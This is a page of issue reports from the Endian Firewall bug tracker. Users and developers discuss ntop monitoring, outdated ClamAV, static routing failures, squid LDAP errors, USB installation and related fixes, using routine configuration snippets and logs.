http://bugs.endian.com/view.php?id=4415 [^]

But, how?
(0008247)
mhLearn   
2012-10-24 08:48   
Just upload the log, hope someone can help to resolve the problem. I am new to this, don't understand the log.
(0008275)
mhLearn   
2012-11-08 11:40   
Installed efw on different computer and traffic monitoring was running perfectly on testing environment, i.e. pc <-> green zone switch <-> efw.

But after putting in environment,

    PCs <-> green zone switch, Orange/Blue router <-> efw <-> 2 Red zones

then it failed to work. Found this error message,

 **ERROR** mVLAN: Host (identical IP/MAC) found on multiple VLANs

What does this mean?
(0008390)
mhLearn   
2013-03-11 04:21   
for those that may facing the same problem. Hope below useful to you.

1. Disable the Traffic monitoring.
2. Run ntop from shell
3. Access web through yourfirewall_ip:port. port can be 3000 or 3001.

Good luck
(0008436)
soportenalucho   
2013-06-06 22:26   
I have the same problem... any solution?
Thank you
(0008443)
daniele-endian   
2013-07-12 11:02   
Hi guys,

please try with the following configuration

===========================================
root@endian:~ # cat /etc/ntop/ntop.conf.tmpl
--user ntop
--daemon
--db-file-path /var/ntop
--interface br0,br1,br2
--trace-level 3
--http-server 0
--https-server 3001
--ipv4
--max-table-rows 150
-x 1000

===========================================
Then do restartntop -f the webinterface with this config should be working fine
(0008447)
ronin   
2013-07-19 20:11   
(edited on: 2013-07-20 01:42)
Daniele-endian, I have tried this config and it appears that it has not fixed the issue. ntop appears to be working for a short period of time and then then web interface times out. when it eventually comes back, stats are reset.
Any other suggestion would be appreciated.
Thx

UPDATE: This config seems to have made the problem worse, fwiw. Availability of the service is even less now. Virtually non-existent even after the restart of ntop

UPDATE-RESOLVED: It appears that if you modify the ntop option so that the web interface is accessible via HTTP rather then HTTPS, everything works fine

(0008458)
luca-endian   
2013-08-26 08:17   
Please try with 2.5.2
(0008467)
mhLearn   
2013-08-26 09:54   
it is working after changed according to provided configuration from daniele-endian.
(0008471)
mhLearn   
2013-08-27 04:52   
it's working fine in 2.5.2
(0008474)
daniele-endian   
2013-08-27 07:15   
Ok, many thanks for the feedback. I close this bug.





View Issue Details
3527 [Endian Firewall] Other Services minor always 2011-03-09 10:09 2013-08-26 08:41
ardit-endian  
peter-endian  
normal  
resolved 2.4  
fixed  
none    
none  
   
Update clamav
[LibClamAV] ***********************************************************
[LibClamAV] *** This version of the ClamAV engine is outdated. ***
[LibClamAV] *** DON'T PANIC! Read http://www.clamav.net/support/faq [^] ***
[LibClamAV] ***********************************************************

2.4 full up to date.
There are no notes attached to this issue.





View Issue Details
4551 [Endian Firewall] Other Services minor always 2013-06-12 12:49 2013-08-26 08:39
baldy  
luca-endian  
normal  
resolved 2.5  
fixed  
none    
none  
   
2.5.1. CE ClamAV Engine needs to be updated.
ClamAV engine is outdated and needs to be updated.

[LibClamAV] ***********************************************************
[LibClamAV] *** This version of the ClamAV engine is outdated. ***
[LibClamAV] *** DON'T PANIC! Read http://www.clamav.net/support/faq [^] [^] ***
[LibClamAV] ***********************************************************
Notes
(0008437)
baldy   
2013-06-12 12:54   
http://downloads.sourceforge.net/clamav/clamav-0.97.8.tar.gz [^]
(0008442)
Neddy   
2013-07-11 09:28   
(edited on: 2013-07-11 09:28)
I wonder is there any method to upgrade ClamAV engine manually? A month later this issue isn't updated.

(0008464)
luca-endian   
2013-08-26 08:38   
fixed with 2.5.2





View Issue Details
4558 [Endian Firewall] Installation minor always 2013-08-05 17:05 2013-08-06 15:50
EDV-Team  
luca-endian  
normal  
resolved 2.5  
fixed  
none    
none 2.5  
   
Endian development channel not reachable when using efw-upgrade or smart update
When switching from Endian stable to development channel with efw-upgrade -s, the devel repository seems to be not reachable at the moment.

Here is the output of smart update:
---
#smart update
Loading cache...
Updating cache... ######################################## [100%]

Fetching information for 'efw-community'...
-> //username@email.com:*@updates.endian.org/devel/.../repomd.xml">http://username@email.com:*@updates.endian.org/devel/.../repomd.xml [//username@email.com:*@updates.endian.org/devel/.../repomd.xml" target="_blank">^]
repomd.xml [ 25%]
error: Failed acquiring release file for 'efw-community':
error: community@updates.endian.org/devel/repodata/repomd.xml:">http://username%40email.com:community@updates.endian.org/devel/repodata/repomd.xml: [community@updates.endian.org/devel/repodata/repomd.xml:" target="_blank">^] File not found
---

We need to use the Endian development channel to get our Intel i340 based network card to work.
So it would be nice if this could be fixed soon,

Thank you very much!
Notes
(0008449)
luca-endian   
2013-08-06 15:50   
This has been fixed today





View Issue Details
4172 [Endian Firewall] Proxy DNS trivial always 2011-09-29 08:41 2013-08-01 15:46
stefano-endian  
 
normal  
feedback 2.4  
reopened  
none    
none  
   
Broken link to malwaredomains
There is a hyperlink in the DNS proxy, under "Anti spyware", labelled "Learn more about the spyware listening post". The new link should be either

http://www.malwaredomains.com/wordpress/?p=1988 [^] or

http://doc.emergingthreats.net/bin/view/Main/SpywareListeningPost [^] (here the listening posts are described, so this should be the correct link)
1. go to Proxy --> DNS --> anti spyware
2. click on the "Learn more about the spyware listening post" link.
Notes
(0007961)
stefano-endian   
2012-07-30 08:03   
This is solved in my last Mini installation:

bash-3.1# rpm -qf /home/httpd/cgi-bin/antispyware.cgi
efw-dnsmasq-2.9.5-0.endian16





View Issue Details
4555 [Endian Firewall] Hardware related (kernel, drivers, hardware) feature always 2013-07-18 13:34 2013-07-18 13:34
marioeirea  
 
normal  
new 2.5  
open  
none    
none  
   
Support for BCM5717
Please add support for BCM5717
There are no notes attached to this issue.





View Issue Details
4549 [Endian Firewall] OpenVPN Client and Server major always 2013-05-27 02:27 2013-07-12 21:27
Sheldmandu  
 
normal  
feedback 2.5  
open  
none    
none  
   
OpenVPN client files not created using user.conf.tmpl
It appears the OpenVPN client files are never created on the 2.5.1 version of EFW. There is a /var/openvpn/clients directory but it's empty. Modifying openvpn.conf.tmpl and uncommenting client-config-dir clients and restarting OpenVPN on EFW doesn't achieve anything either.

It appears that the file /etc/openvpn/user.conf.tmpl is never actually used to create the client files, which is why its not possible to set a static IP for an OpenVPN client or push a DNS server or domain. This used to work on 2.4.x

Please advise of a workaround for the short term, perhaps some script can be run manually to create the files using the user.conf.tmpl
Notes
(0008445)
Anonymous   
2013-07-12 21:27   
Any news???





View Issue Details
4553 [Endian Firewall] Kernel minor have not tried 2013-07-12 04:32 2013-07-12 04:32
Neddy x64  
 
high  
new 2.5  
open  
none    
none  
   
Number of allowed concurrent connections exceeded
Enabled Endian Firewall and transparent firewall for dozens of users, after half an hour, this messages appear.

How could I increase number of concurrent connections?
System 2013-07-12 10:49:49 syslog-ng (2674) Number of allowed concurrent connections exceeded; num="256", max="256"
System 2013-07-12 10:49:49 syslog-ng (2674) Number of allowed concurrent connections exceeded; num="256", max="256"
System 2013-07-12 10:49:49 syslog-ng (2674) Number of allowed concurrent connections exceeded; num="256", max="256"
System 2013-07-12 10:49:49 syslog-ng (2674) Number of allowed concurrent connections exceeded; num="256", max="256"
System 2013-07-12 10:49:49 syslog-ng (2674) Number of allowed concurrent connections exceeded; num="256", max="256"
There are no notes attached to this issue.





View Issue Details
4545 [Endian Firewall] Proxy - HTTP major sometimes 2013-05-07 13:21 2013-06-29 19:10
rodrigor.bnu Windows  
Windows Server  
high 2008 R2  
new 2.5  
open  
none    
none  
   
error squid_ldap_group
Hello guys,

I started to test the Endian 2.5.1 and enjoyed. Currently I'm testing on a VM in Hyper-v. Well, already configured for integration with Active Directory and is listing the users and groups usually ok communication. I began to configure some access policies for a group of AD and early functioned properly, but after some time the policies do not work anymore and blocked everything, just out of nowhere. Since this policy is like first. When running a tail-f / var / log / squid / cache.log appear the following errors:

user filter '(&(objectClass=person)(sAMAccountName=squid))', searchbase 'dc=edusoft,dc=net'
attempting to authenticate user 'CN=squid,CN=Users,DC=edusoft,DC=net'
Connected OK
group filter '(&(objectClass=person)(sAMAccountName=squid)(memberOf=CN=Suporte,OU=Groups Edusoft,OU=Edusoft,DC=edusoft,DC=net))', searchbase 'dc=edusoft,dc=net'
squid_ldap_group WARNING, LDAP search error 'Operations error'
Connected OK
group filter '(&(objectClass=person)(sAMAccountName=squid)(memberOf=CN=Administrators,CN=Builtin,DC=edusoft,DC=net))', searchbase 'dc=edusoft,dc=net'

At another time also appeared the message:

Can't contact LDAP server

It seems that error is occurring in the validation of the AD group, but when I edit an access policy appears normally AD users and groups.

Any idea what it might be?

Rodrigo
After login and navigate the links, after some time the links are blocked released.
erro_endian.JPG (73,887) 2013-05-07 13:21
https://bugs.endian.com/file_download.php?file_id=1049&type=bug
Notes
(0008439)
yanqian   
2013-06-29 19:10   
Hi,
I am not familiar with endian firewall, but I got the same error before when I ran squid in a linux box, I had to add "-R" option to squid_ldap_group helper, then issue solved.





View Issue Details
1132 [Endian Firewall] Migration minor have not tried 2008-07-16 15:44 2013-06-05 14:58
mablass  
 
normal  
acknowledged 2.2-rc1  
open  
none    
none  
   
Static Routes defined in GUI dont work properly
i definded some static routes in the gui. ping to the destination network worked correctly. ssh for example not. after trying some things out with firewall settings i decided to put the routes directly to the system by using route add -net 1 ... in the efw server. now everything is fine. as the new 2.2. allows to use a gui but the result is not working i guess its a problem :)

Notes
(0001451)
mablass   
2008-07-16 17:04   
update: the problem can only be solved by adding some additional NAT rule for the target network. actually i believe the topic is related to 0000444. ping works with the gui defintion but not other services
(0001452)
peter-endian   
2008-07-16 17:11   
are you sure that you don't miss the return route or default route on the other side?
mentioning the NAT rules would make me think of that
(0001463)
mablass   
2008-07-18 21:33   
when using a hardwarebox everything works fine. i just downgraded to endian 2.1.2 and added static routes. everything is ok - but 2.2 makes trouble
(0001995)
Brains   
2009-02-24 16:21   
Confirmed - static routes added via the GUI are never passed down to the kernel.

Adding routes via the shell works as intended (ie. route add -net <network> gw <gateway>)
(0002611)
Telemak   
2009-06-12 14:44   
Confirmed for me too with 2.2 final
(0002612)
luca-endian   
2009-06-12 15:59   
Can you paste the output of these commands:
cat /var/efw/routing/config
ip rule show
(0002618)
Telemak   
2009-06-12 19:36   
In this configuration, the route don't work all the time, but only after making a traceroute in the pc.
But after puting it by the route add command, maybe it works better. I will have result of this test Monday.
(0002652)
Telemak   
2009-06-22 15:44   
It's all ok if I put the routes with this command in ssh :

route add -host 80.74.67.37 gw 10.10.13.2
route add -net 81.1.62.224 netmask 255.255.255.224 gw 10.10.13.2
route add -net 136.9.0.0/16 gw 10.10.13.2

For helping...

Telemak
(0002653)
peter-endian   
2009-06-22 16:49   
you created routing entries which direct traffic *from* 10.10.13.00/24 to several networks to the gateway 10.10.13.2

For example this rule:
on,10.10.13.0/24,6x.xx.xx.0/24,10.10.13.2,,,,,,,,

means, that *only* traffic from 10.10.13.0/24 to that external network goes through gateway 10.10.13.2. Maybe that is not what you want. Maybe you want direct *all* traffic to that external ip through the gateway?

That's what you did with the route commands. Those route commands aren't exactly the same configuration as through the GUI. BTW, "route" is a deprecated interface and may be overruled by other ip rule entries.

Try to remove the source-part of your GUI rules, that should then be the same as you did with the route commands.
(0002692)
luca-endian   
2009-06-29 14:13   
can you gently paste the output of this command:

ip route show table 5

thank you
(0002694)
Telemak   
2009-06-29 14:34   
Puting a source or not ? I will try but if I've choice, I prefer puting a source. (And all the PC concerned are really in 10.10.13.0/24, the others may not use this routes).

ip route show table 5 give :
default via 10.10.13.2 dev br0
(0002702)
Telemak   
2009-06-30 12:38   
In the GUI, in the routing page, the source is shown as required. But like you say, we can not fill it with no GUI error.
I've corrected the routes by removing source and not puting it manually in kernel routing. Then I obtain :

Commande : route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
10.10.23.0 * 255.255.255.0 U 0 0 0 eth1
10.10.13.0 * 255.255.255.0 U 0 0 0 br0
default 10.10.23.200 0.0.0.0 UG 0 0 0 eth1

Commande : ip route show table 5
Same as above

Comande : ip route show
0: from all lookup local
5: from all to 10.10.13.200/24 lookup main
5: from all to 10.10.23.0/24 lookup main
10: from all to 62.23.96.0/24 lookup 5
10: from all to 80.74.67.37 lookup 5
10: from all to 81.1.62.224 lookup 5
10: from all to 136.9.0.0/16 lookup 5
10: from all to 192.28.103.0/24 lookup 5
10: from all to 193.56.211.51 lookup 5
10: from all to 193.56.211.53 lookup 5
10: from all to 193.56.211.81 lookup 5
10: from all to 194.51.14.0/16 lookup 5
10: from all to 194.206.181.240 lookup 5
10: from all to 194.206.181.252 lookup 5
10: from all to 195.46.218.22 lookup 5
10: from all to 212.234.59.105 lookup 5
10: from all to 212.234.59.239 lookup 5
10: from all to 66.225.239.127 lookup 5
10: from all to 212.234.229.40 lookup 5
10: from all to 10.10.10.0/24 lookup 5
10: from all to 10.10.11.0/24 lookup 5
10: from all to 10.10.12.0/24 lookup 5
10: from all to 10.10.14.0/24 lookup 5
199: from all fwmark 0x7e0/0x7f8 lookup uplink-main
200: from 10.10.23.100 lookup uplink-main
32766: from all lookup main
32767: from all lookup default

Say me if you want something more.
(0003649)
n9yty   
2010-01-06 15:51   
Is this still under investigation? I am setting up a new endian v2.3 system and am seeing the exact same problem. Adding a route in the GUI does not allow it to work. Primarily I am trying to add a route to a network behind another router on the GREEN interface. Setting it up in the GUI without a source address does not update the kernel tables, and other output is identical to what is shown above in terms of ip route show table 5 and the efw/routing/config file. Yet doing a route command at the shell works as expected.
(0003726)
sifi986   
2010-01-30 13:12   
ip is the replacement command from the iputils package, and is used to alter routing tables in Endian. Routes can be placed in many tables, only table 254 (main) is operated on by kernel routing table or displayed in output of route command.

Note that tables other than 254 are not displayed by the route command i.e. table 5 is not shown, but is acted on if input to GUI is in the correct format and routing will be successful.

When Endian adds routes to networks behind Green in EFW page Network/Routing/Static routing/Add new route. The new route is added to table 5 and can be seen as above, by command "ip route show table 5" more detailed display by using "ip rule show" and "ip route show all" Note. table 5 is a rule.

A source address need not be specified (Even thou the field id, is marked with an asterisk (*This Field is required)

The Destination network must be entered in CDIR notation i.e. /24 for 255.255.255.0

Route Via* Static Gateway is entered as a IP address in dotted decimal notation.

After entering network behind green details into GUI full routing is fully functional on 2.3

Maybe Endian could add note to page advising to use CDIR notation for addresses in network dialogue boxes on this screen. (New documentation on web has been updated to reflect this too, which is good. Click help in top right hand corner)
(0005179)
ytech   
2010-11-23 02:07   
I have the latest version 2.41 (2.6.32.25-57.e40.i586) the same version with 2 real machines and one virtual lab and the issue continues. It is necessary to add route manually.

Thanks
(0007404)
Sheldmandu   
2011-09-14 06:18   
I have the latest version as well and there is still the issue. Adding the route manually by connecting via SSH and running route add command works fine as a workaround
(0007740)
shairozan   
2012-03-02 18:11   
I also have the latest version 2.5 R1 and this is still an issue. Is anyone actually working on this issue? The last time I see a non-reporter working on this was in 2009
(0007858)
cemendes   
2012-05-06 03:23   
That still a problem on 2.5.1. Any way we can get it fixed?
(0008433)
ltinti   
2013-06-05 14:58   
To save the route commands manually, add them to /etc/init.d/rc.local.

Something like

#!/bin/sh

route add -net 10.0.0.0/24 gw 192.168.0.2

exit 0





View Issue Details
4547 [Endian Firewall] Application Level Proxies block always 2013-05-21 15:33 2013-05-28 09:22
ddimitrov@computel.bg  
 
normal  
new 2.5  
open  
none    
none  
   
HTTP Proxy - (104) Connection reset by peer
Kernel version: 2.6.32.43-57.e48.i686.PAE

When HTTP Proxy filter is ON a web page can't be loaded at all (may be the issue will happened with others but I can't say at the moment). Instead, a web page from endian saying "(104) Connection reset by peer" appeares. When I turn the HTTP proxy off I can successfully load the web page in question. The problematic web page is - http://www.minfin.bg. [^]
The issue arisen regardless of the browser.

Thank you in advance.
Err(104)_.jpg (134,572) 2013-05-21 15:33
https://bugs.endian.com/file_download.php?file_id=1051&type=bug
Notes
(0008432)
ddimitrov@computel.bg   
2013-05-28 09:22   
This issue was already reported and reproduced through another channel (Panda Support Channel).
Endian support is aware of this issue and soon will provide a solution. Till then:

As a temporary solution add the ip address of the web sites involved into the bypass proxy list.





View Issue Details
4548 [Endian Firewall] Documentation minor N/A 2013-05-23 14:00 2013-05-23 14:00
buckmanr  
 
high  
new 2.5  
open  
none    
none  
   
Please provide documentation in PDF
Online HTML does not print correctly -- exceeds margins.

Copy and paste into Word requires excessive time tryint to reformat.

Request a PDF of the documentation, please.
There are no notes attached to this issue.





View Issue Details
4374 [Endian Firewall] Installation minor always 2012-06-04 19:41 2013-05-16 22:23
ms  
 
normal  
new 2.5  
open  
none    
none  
   
Installation of Endian Firewall from USB flash drive fails
When trying to install EFW 2.5.1 from an USB flash drive, the installation fails before the first user input is required.
The system is booting the vmlinuz which is located on the USB drive. After that the /etc/inittab from instroot.gz is read and /bin/installer is executed. This installer file runs in an endless loop and the VGA display flashes blue/black.

Yes, I double-checked the MD5 checksums on the EFW installation ISO file.
I tried several methods to create the USB drive
1. using unetbootin 5.75 (http://unetbootin.sourceforge.net/ [^]) on a Windows plattform
2. dd/copy files from EFW installation CD-ROM to USB drive
mountsource.sh (3,058) 2012-06-04 19:53
https://bugs.endian.com/file_download.php?file_id=950&type=bug
Notes
(0007890)
ms   
2012-06-04 19:55   
I tracked the issue down to the installation file /bin/mountsource.sh
This file tries to mount the USB flash drive and checks for Endian installer files. Unfortunately /bin/mountsource.sh won't find the USB drive unless it is formatted with ext3 file system.
If it is formatted with some different (most likely vfat when working with Windows), /bin/mountsource.sh fails and /bin/installer loops without ending.

Please find attached a fixed version of /bin/mountsource.sh
In this file I removed the filesystem ext3 used with the mount command. I would be happy if you check with my solution and consider including it in the next Endian Firewall release.
(0008393)
drzoidberg33   
2013-03-12 18:54   
Why hasn't this fix been pushed up to the release? I really know very few people who don't use flash drives to install things these days and 9 out of 10 times they won't be formatted as ext3.
(0008430)
psraj   
2013-05-16 22:23   
How do you access /bin/mountsource.sh from the USB image?





View Issue Details
4472 [Endian Firewall] Uncategorized major always 2012-10-22 23:43 2013-05-08 05:44
marioeirea  
luca-endian  
normal  
resolved 2.5  
no change required  
none    
none  
   
SIP Proxy Endian 2.5.1
Endian 2.5.1 rewrites sip packets exiting tap1 with the IP to main interface. It also makes the changes inside the SIP packet which makes me believe there is some sort of SIP proxy action. The problem is I cannot find a sip proxy installed and this was a fresh install of Endian 2.5.1 not an upgrade. Is there some daemon running in the back that does these rewrites? Please see attached wire shark sniff. I have removed public IP information. Please note this capture was taken issuing the command: "tcpdump -s 0 -i tap1 -w tap1.pcap" The correct flow show have the internal IP of the phone as the source and not the external IP of the Endian uplink interface. I believe this started happening when I enabled the web proxy in transparent mode with dansguardian but cannot be sure. When the server replies, it replies to the endian public IP address over the public internet.
tap1 capture.jpg (258,270) 2012-10-22 23:43
https://bugs.endian.com/file_download.php?file_id=997&type=bug
Notes
(0008251)
luca-endian   
2012-10-29 17:31   
sip proxy has been removed long time ago now this stuff is handled by linux kernel with conntrack modules.
(0008254)
marioeirea   
2012-10-29 18:43   
Right. However, it should not be changing the connections leaving the tap1 interface. Especially not with Endian's red IP as the source address. If a sip device is supposed to connect over the VPN there should not be a rewrite.
(0008429)
marioeirea   
2013-05-08 05:43   
So this is what happens: When the EFW is restarted, the phones attempt to reconnect before the VPN is established. At this point, conntrack intercepts the connection, rewriting all packets leaving the TAP interface with the RED address. To fix the issue, one must flush the conntrack table issuing the command "conntrack -F conntrack". To prevent this from happening in the future, enable the outgoing firewall and block the destination IP the sip connections will connect to over the VPN. This way the connection is not intercepted with conntrack until the proper interface comes up.





View Issue Details
4391 [Endian Firewall] Hardware related (kernel, drivers, hardware) block have not tried 2012-07-06 01:50 2013-05-08 01:49
diwoda  
 
normal  
new 2.5  
open  
none    
none  
   
System not recognizing Intel nic based on 82574L
Possibly somehow related to issue 0003451

System has two onboard nics, one is Intel 82574L, the other 82579LM. One of those two nics is not seen by 2.5 in networconfiguration but works just without any problems in 2.4...I think both NICs use the e1000e driver.

I've seen a difference in loading network driver as it seems the 2.4 uses 1.2.20-NAPI while 2.5 is loading at the same point 1.0.2-k2.

Any idea?
Notes
(0008428)
spittlbm   
2013-05-08 01:49   
This is a kernel module issue that could be resolved by updating the e1000e module to a more recent version.





View Issue Details
4544 [Endian Firewall] Endian Firewall crash always 2013-05-02 07:59 2013-05-02 07:59
mhellemans  
 
urgent  
new 2.2-rc3  
open  
none    
none  
   
Upgrading to 2.5.1 (Development) causes error code
Running efw-upgrade command result in following error message:

========================
Committing transaction...
Preparing... ######################################## [ 0%]
error: file /etc/init.d from install of chkconfig-1.3.11.2-1 conflicts with file from package initscripts-2.2.41-0.endian5
error: file /bin/login from install of util-linux-ng-2.13.1-6_WR.endian5 conflicts with file from package shadow-utils-4.0.3-56.endian1



Committing transaction...
Preparing... ######################################## [ 0%]
error: file /etc/init.d from install of chkconfig-1.3.11.2-1 conflicts with file from package initscripts-2.2.41-0.endian5
error: file /bin/login from install of util-linux-ng-2.13.1-6_WR.endian5 conflicts with file from package shadow-utils-4.0.3-56.endian1


ERROR: Error during upgrade of rpm

Committing transaction...
Preparing... ######################################## [ 0%]
error: file /etc/init.d from install of chkconfig-1.3.11.2-1 conflicts with file from package initscripts-2.2.41-0.endian5
error: file /bin/login from install of util-linux-ng-2.13.1-6_WR.endian5 conflicts with file from package shadow-utils-4.0.3-56.endian1


ERROR: Error during upgrade of rpm

Committing transaction...
Preparing... ######################################## [ 0%]
error: file /etc/init.d from install of chkconfig-1.3.11.2-1 conflicts with file from package initscripts-2.2.41-0.endian5
error: file /bin/login from install of util-linux-ng-2.13.1-6_WR.endian5 conflicts with file from package shadow-utils-4.0.3-56.endian1


ERROR: Error during upgrade of rpm

Committing transaction...
Preparing... ######################################## [ 0%]
error: file /etc/init.d from install of chkconfig-1.3.11.2-1 conflicts with file from package initscripts-2.2.41-0.endian5
error: file /bin/login from install of util-linux-ng-2.13.1-6_WR.endian5 conflicts with file from package shadow-utils-4.0.3-56.endian1


ERROR: Error during upgrade of rpm

Committing transaction...
Preparing... ######################################## [ 0%]
error: file /etc/init.d from install of chkconfig-1.3.11.2-1 conflicts with file from package initscripts-2.2.41-0.endian5
error: file /bin/login from install of util-linux-ng-2.13.1-6_WR.endian5 conflicts with file from package shadow-utils-4.0.3-56.endian1


ERROR: Error during upgrade of rpm

Committing transaction...
Preparing... ######################################## [ 0%]
error: file /etc/init.d from install of chkconfig-1.3.11.2-1 conflicts with file from package initscripts-2.2.41-0.endian5
error: file /bin/login from install of util-linux-ng-2.13.1-6_WR.endian5 conflicts with file from package shadow-utils-4.0.3-56.endian1


ERROR: Error during upgrade of rpm

Committing transaction...
Preparing... ######################################## [ 0%]
error: file /etc/init.d from install of chkconfig-1.3.11.2-1 conflicts with file from package initscripts-2.2.41-0.endian5
error: file /bin/login from install of util-linux-ng-2.13.1-6_WR.endian5 conflicts with file from package shadow-utils-4.0.3-56.endian1


ERROR: Error during upgrade of rpm

Committing transaction...
Preparing... ######################################## [ 0%]
error: file /etc/init.d from install of chkconfig-1.3.11.2-1 conflicts with file from package initscripts-2.2.41-0.endian5
error: file /bin/login from install of util-linux-ng-2.13.1-6_WR.endian5 conflicts with file from package shadow-utils-4.0.3-56.endian1


ERROR: Error during upgrade of rpm
ERROR: Error during upgrade of rpm
There are no notes attached to this issue.





View Issue Details
4543 [Endian Firewall] Endian Network block always 2013-05-02 06:59 2013-05-02 06:59
lorenzo.spinelli endian  
firewall  
immediate community  
new 2.5  
open  
none    
none  
   
green network fault in hyper-v 2012 legacy adapter
After few hours from reboot green don't respond. I've 2 uplink network in same hyper-v 2012 network Adapter configuration that work without problem.
Reload.
There are no notes attached to this issue.





View Issue Details
4542 [Endian Firewall] Proxy - HTTP tweak always 2013-05-01 02:37 2013-05-01 02:37
albertgordojr 2.5.1  
 
high  
new 2.5  
open  
none    
none  
   
WCCP in Proxy
Hi,

It is possible to setup the wccp in proxy? I can see that in version 2.5.1 community, wccp2 is already compiled. I have added the wccp2_* setup in squid template and created a GRE tunnel manually using ip tunnel and ifconfig to up the GRE interface.

the problem is, i don't see any tcpdump in the GRE tunnel that I created. It seems the wccp request is not getting to the wccp router.

Please help.

Thank you.

Regards,

Albert
There are no notes attached to this issue.





View Issue Details
4162 [Endian Firewall] Proxy HTTP major random 2011-09-20 09:30 2013-04-23 14:17
luca-endian  
ardit-endian  
normal  
resolved 2.4.1  
no change required  
none    
none  
   
clamd crash, tcp socket should be monitored
Hi Guys,

this happens randomly:

Sep 2 09:19:46 xxx havp[3818]: Scanner errors: Clamd: Could not connect to scanner socket (lasturl: http://www.google.it/ [^])
Sep 2 09:19:47 xxx havp[3824]: Clamd: Could not connect to scanner! Scanner down?
Sep 2 09:20:45 xxx havp[3813]: Clamd: Could not connect to scanner! Scanner down?
Sep 2 09:20:45 xxx havp[3811]: Scanner errors: Clamd: Could not connect to scanner socket (lasturl: http://crl.microsoft.com/pki/crl/products/CodeSignPCA2.crl [^])
Sep 2 09:21:06 xxx havp[4051]: Clamd: Could not connect to scanner! Scanner down?
Sep 2 09:21:06 xxx havp[4034]: Scanner errors: Clamd: Could not connect to scanner socket (lasturl: http://check.sanasecurity.com/ [^])
Sep 2 09:21:06 xxx havp[4034]: 127.0.0.1 POST 200 http://check.sanasecurity.com/ [^] 264+495 SCANERROR Clamd: Could not connect to scanner socket

**POSSIBLE SOLUTION**

We should check the clamd socket with monit, which is pretty easy since monit support the CLAMAV protocol!

root@xxx:/etc/monit.d # cat clamd.conf
 check process clamd with pidfile /var/run/clamav/clamd.pid
   group virus
   start program = "/etc/init.d/clamd start"
   stop program = "/etc/init.d/clamd stop"
   if failed host 127.0.0.1 port 3310 protocol CLAMAV for 5 cycle then restart
   if 5 restarts within 5 cycles then timeout
   depends on clamavd_bin
   mode manual

 check file clamavd_bin with path /usr/sbin/clamd
   group virus
   if failed checksum then unmonitor
   if failed permission 755 then unmonitor
   if failed uid root then unmonitor
   if failed gid root then unmonitor
   mode manual

This would increase reliability for http proxy and smtp proxy as well!
What you think?
Notes
(0008426)
ardit-endian   
2013-04-23 14:16   
this happens also on 2.5 full up to date, after dedicated tests :D and monitoring the problem is caused *somehow* by the updates, if the updates are weekley happens but if are set to daily doesn't happen anymore.
(0008427)
ardit-endian   
2013-04-23 14:17   
set the update to daily for the antivirus and will not happen





View Issue Details
3221 [Endian Firewall] Proxy HTTP major sometimes 2010-10-25 17:41 2013-04-16 19:29
bortol  
lorenzo-endian  
normal  
feedback 2.4  
open  
none    
none  
   
http proxy don't returns anything after some time. If flush cache of Squid, the firewall works again correctly
After some utilisation the firewall don't returns pages. Ping is working, dns also.
If I flush the cache of squid, proxy is again OK.
In /var/log/squid/cache.log some error

TCP connection to 127.0.0.2/9999 failed

very frewquently also this:

httpReadReply: Excess data from "GET http://cr-tools.clients.google.com/service/check2?appid=%7B430FD4D0-B729-4F6$ [^]


other error in cache.log:

Initialising SSL.
2010/10/25 13:36:28| Store logging disabled
2010/10/25 13:36:28| Referer logging is disabled.
2010/10/25 13:36:28| DNS Socket created at 0.0.0.0, port 35399, FD 10
2010/10/25 13:36:28| Adding nameserver 127.0.0.1 from /etc/resolv.conf
2010/10/25 13:36:28| helperOpenServers: Starting 20 'ncsa_auth' processes
2010/10/25 13:36:29| Accepting transparently proxied HTTP connections at 0.0.0.0, port 8080, FD 35.
2010/10/25 13:36:29| Accepting SNMP messages on port 3401, FD 36.
2010/10/25 13:36:29| WCCP Disabled.
2010/10/25 13:36:29| Configuring Parent 127.0.0.1/9999/0
2010/10/25 13:36:29| Configuring Parent 127.0.0.2/9999/0
2010/10/25 13:36:29| Configuring Parent 127.0.0.1/9998/0
2010/10/25 13:36:29| Loaded Icons.
2010/10/25 13:36:29| Ready to serve requests.
2010/10/25 13:37:11| TCP connection to 127.0.0.2/9999 failed
2010/10/25 13:37:11| TCP connection to 127.0.0.2/9999 failed
2010/10/25 13:37:11| TCP connection to 127.0.0.2/9999 failed
2010/10/25 13:37:11| TCP connection to 127.0.0.2/9999 failed
2010/10/25 13:37:11| TCP connection to 127.0.0.2/9999 failed
2010/10/25 13:37:11| TCP connection to 127.0.0.2/9999 failed
2010/10/25 13:37:11| TCP connection to 127.0.0.2/9999 failed
2010/10/25 13:37:11| TCP connection to 127.0.0.2/9999 failed
2010/10/25 13:37:11| TCP connection to 127.0.0.2/9999 failed
2010/10/25 13:37:11| TCP connection to 127.0.0.2/9999 failed
2010/10/25 13:37:11| Detected DEAD Parent: content2
2010/10/25 13:37:11| Failed to select source for 'http://123.123.123.123/wpad.dat' [^]
2010/10/25 13:37:11| always_direct = 0
2010/10/25 13:37:11| never_direct = 1
2010/10/25 13:37:11| timedout = 0
2010/10/25 13:37:12| Failed to select source for 'http://crl.verisign.com/pca3.crl' [^]
2010/10/25 13:37:12| always_direct = 0
2010/10/25 13:37:12| never_direct = 1
2010/10/25 13:37:12| timedout = 0



Sorry for my english and also for my very low technical know-how

I've installed endian in my School. Now this problem is blocking navigation everyday....


Luigi
Notes
(0005204)
gmar_87   
2010-11-25 10:14   
I too am having this problem. I restored an Endian Firewall 2.3 backup config to an identical hardware spec server also running version 2.3 and see this issue everyday!

I reinstalled Endian, this time with 2.4.1 and restored the backup, but still occurring. The end-user sees "Read Error. Connection reset by peer".

My cache log shows:
2010/11/25 16:39:52| TCP connection to 127.0.0.2/9999 failed
2010/11/25 16:39:52| Detected DEAD Parent: content2

I have now disabled antivirus scans in my content filters to see if that is the cause...
(0005264)
lorenzo-endian   
2010-12-02 09:26   
Hi bortol and gmar_87,

does you efw work after disabling the antivirus scan?

This info would be useful to troubleshoot the problem!

Thanks in advance!

Lo
(0005265)
gmar_87   
2010-12-02 09:34   
Hi Lo,

Proxy seems to be stable after disabling anti-virus scanning under proxy content filter settings.
Uptime = 6d 22h 44m so far..

Cheers,
John
(0005266)
gmar_87   
2010-12-02 09:36   
also seemed to only occur under heavy load/traffic.
(0005303)
gmar_87   
2010-12-05 23:23   
Definitely related to having Anti virus scanning enabled under content filter.
EFW has been up for 10d 12h 20m after disabling this option.
(0005369)
bortol   
2010-12-14 09:27   
I've reinstalled all with release 2.4.0 and I don't have any problem from 31d 9h 53m (with antivirus scan actived).
